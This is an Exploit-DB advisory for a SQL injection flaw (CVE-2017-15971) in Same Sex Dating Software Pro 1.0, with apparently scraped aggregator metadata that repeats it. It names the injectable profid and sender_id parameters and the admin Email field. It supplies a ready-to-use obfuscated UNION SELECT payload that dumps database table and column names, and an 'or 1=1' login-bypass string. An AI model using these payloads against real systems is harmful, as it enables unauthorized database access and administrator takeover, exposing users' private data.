ID EDB-ID:43088
Type exploitdb
Reporter Exploit-DB
Modified 2017-10-30T00:00:00
Description
Same Sex Dating Software Pro 1.0 - SQL Injection. CVE-2017-15971. Webapps exploit for PHP platform
# # # # #
# Exploit Title: Same Sex Dating Software Pro 1.0 - SQL Injection
# Dork: N/A
# Date: 30.10.2017
# Vendor Homepage: http://www.softdatepro.com/
# Software Link: https://codecanyon.net/item/same-date-pro-same-sex-dating-software/4530959
# Demo: http://www.ss.softdatepro.com/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-15971
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows a user to inject SQL commands through the request parameters and the admin login field listed below.
#
# Proof of Concept:
#
# http://localhost/[PATH]/viewprofile.php?profid=[SQL]
# http://localhost/[PATH]/viewmessage.php?sender_id=[SQL]
#
# -263'++/*!08888UNION*/+/*!08888ALL*/+/*!08888SELECT*/+0x31,0x32,(/*!08888SElEct*/+ExpOrt_sEt(5,@:=0,(/*!08888sElEct*/+cOunt(*)/*!08888frOm*/(infOrmatiOn_schEma.cOlumns)whErE@:=ExpOrt_sEt(5,ExpOrt_sEt(5,@,/*!08888tablE_namE*/,0x3c6c693E,2),/*!08888cOlumn_namE*/,0xa3a,2)),@,2)),0x34,0x35,0x36,0x37,0x38,0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136--+-
#
# http://localhost/[PATH]/admin
#
# Email: 'or 1=1 or ''=' Pass: anything
#
# Etc..
# # # # #
{"id": "EDB-ID:43088", "hash": "e3a6ac55deb6794037e88bc07ec0d2ed", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Same Sex Dating Software Pro 1.0 - SQL Injection", "description": "Same Sex Dating Software Pro 1.0 - SQL Injection. CVE-2017-15971. Webapps exploit for PHP platform", "published": "2017-10-30T00:00:00", "modified": "2017-10-30T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/43088/", "reporter": "Exploit-DB", "references": [], "cvelist": ["CVE-2017-15971"], "lastseen": "2017-10-31T00:31:47", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 3.8, "vector": "NONE", "modified": "2017-10-31T00:31:47"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-15971"]}, {"type": "zdt", "idList": ["1337DAY-ID-28918"]}], "modified": "2017-10-31T00:31:47"}, "vulnersScore": 3.8}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/43088/", "sourceData": "# # # # # \r\n# Exploit Title: Same Sex Dating Software Pro 1.0 - SQL Injection\r\n# Dork: N/A\r\n# Date: 30.10.2017\r\n# Vendor Homepage: http://www.softdatepro.com/\r\n# Software Link: https://codecanyon.net/item/same-date-pro-same-sex-dating-software/4530959\r\n# Demo: http://www.ss.softdatepro.com/\r\n# Version: 1.0\r\n# Category: Webapps\r\n# Tested on: WiN7_x64/KaLiLinuX_x64\r\n# CVE: CVE-2017-15971\r\n# # # # #\r\n# Exploit Author: Ihsan Sencan\r\n# Author Web: http://ihsan.net\r\n# Author Social: @ihsansencan\r\n# # # # #\r\n# Description:\r\n# The vulnerability allows an users to inject sql commands....\r\n# \t\r\n# Proof of Concept:\r\n# \r\n# http://localhost/[PATH]/viewprofile.php?profid=[SQL]\r\n# http://localhost/[PATH]/viewmessage.php?sender_id=[SQL]\r\n# \r\n# 
-263'++/*!08888UNION*/+/*!08888ALL*/+/*!08888SELECT*/+0x31,0x32,(/*!08888SElEct*/+ExpOrt_sEt(5,@:=0,(/*!08888sElEct*/+cOunt(*)/*!08888frOm*/(infOrmatiOn_schEma.cOlumns)whErE@:=ExpOrt_sEt(5,ExpOrt_sEt(5,@,/*!08888tablE_namE*/,0x3c6c693E,2),/*!08888cOlumn_namE*/,0xa3a,2)),@,2)),0x34,0x35,0x36,0x37,0x38,0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136--+-\r\n# \r\n# http://localhost/[PATH]/admin\r\n# \r\n# Email: 'or 1=1 or ''=' Pass: anything\r\n# \r\n# Etc..\r\n# # # # #", "osvdbidlist": [], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:16:54", "bulletinFamily": "NVD", "description": "Same Sex Dating Software Pro 1.0 allows SQL Injection via the viewprofile.php profid parameter, the viewmessage.php sender_id parameter, or the /admin Email field, a related issue to CVE-2017-15972.", "modified": "2017-11-17T16:17:00", "id": "CVE-2017-15971", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-15971", "published": "2017-10-29T06:29:00", "title": "CVE-2017-15971", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-03-13T20:32:57", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2017-10-31T00:00:00", "published": "2017-10-31T00:00:00", "href": "https://0day.today/exploit/description/28918", "id": "1337DAY-ID-28918", "title": "Same Sex Dating Software Pro 1.0 - SQL Injection Vulnerability", "type": "zdt", "sourceData": "# # # # # \r\n# Exploit Title: Same Sex Dating Software Pro 1.0 - SQL Injection\r\n# Vendor Homepage: http://www.softdatepro.com/\r\n# Software Link: https://codecanyon.net/item/same-date-pro-same-sex-dating-software/4530959\r\n# Demo: http://www.ss.softdatepro.com/\r\n# Version: 1.0\r\n# Category: Webapps\r\n# Tested on: WiN7_x64/KaLiLinuX_x64\r\n# CVE: CVE-2017-15971\r\n# # # # #\r\n# Exploit Author: Ihsan Sencan\r\n# Author Web: http://ihsan.net\r\n# Author Social: @ihsansencan\r\n# # # # #\r\n# Description:\r\n# The vulnerability allows an users to inject sql commands....\r\n# \r\n# Proof of Concept:\r\n# \r\n# http://localhost/[PATH]/viewprofile.php?profid=[SQL]\r\n# http://localhost/[PATH]/viewmessage.php?sender_id=[SQL]\r\n# \r\n# 
-263'++/*!08888UNION*/+/*!08888ALL*/+/*!08888SELECT*/+0x31,0x32,(/*!08888SElEct*/+ExpOrt_sEt(5,@:=0,(/*!08888sElEct*/+cOunt(*)/*!08888frOm*/(infOrmatiOn_schEma.cOlumns)[email\u00a0protected]:=ExpOrt_sEt(5,ExpOrt_sEt(5,@,/*!08888tablE_namE*/,0x3c6c693E,2),/*!08888cOlumn_namE*/,0xa3a,2)),@,2)),0x34,0x35,0x36,0x37,0x38,0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136--+-\r\n# \r\n# http://localhost/[PATH]/admin\r\n# \r\n# Email: 'or 1=1 or ''=' Pass: anything\r\n# \r\n# Etc..\r\n# # # # #\n\n# 0day.today [2018-03-13] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/28918"}]}